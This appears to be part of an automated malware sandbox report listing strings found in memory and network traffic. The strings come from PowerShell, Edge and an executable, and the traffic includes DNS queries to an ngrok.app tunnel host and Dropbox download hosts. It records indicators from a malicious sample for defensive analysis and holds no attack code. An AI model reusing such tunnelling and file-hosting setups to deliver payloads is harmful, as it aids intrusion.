                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; img-src https://* data: blob: ; media-src https://* blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; img-src https://* data: blob: ; media-src https://* blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m/static/serviceworker/ blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; font-src https://* data: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rt-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; font-src https://* data: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; media-src https://* blob: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                      Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                      Source: global trafficDNS traffic detected: DNS query: uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                      Source: 1718218388.exe, 0000001B.00000002.2753649067.0000000002550000.00000004.00001000.00020000.00000000.sdmp, 1718218388.exe, 0000001B.00000000.2531449583.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001C.00000000.2702223771.000000000053D000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatch
                      Source: 1718218388.exe, 0000001B.00000002.2753649067.0000000002550000.00000004.00001000.00020000.00000000.sdmp, 1718218388.exe, 0000001B.00000000.2531449583.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001C.00000000.2702223771.000000000053D000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://.macromedia.com/support/flashplayer/sys/https://SettingsSubdomainmms.cfgdefaultAuthorLocalSec
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                      Source: msedge.exe, 00000005.00000003.2316440045.000009BC0039C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                      Source: msedge.exe, 00000005.00000003.2316440045.000009BC0039C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                      Source: msedge.exe, 00000005.00000003.2316440045.000009BC0039C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                      Source: msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
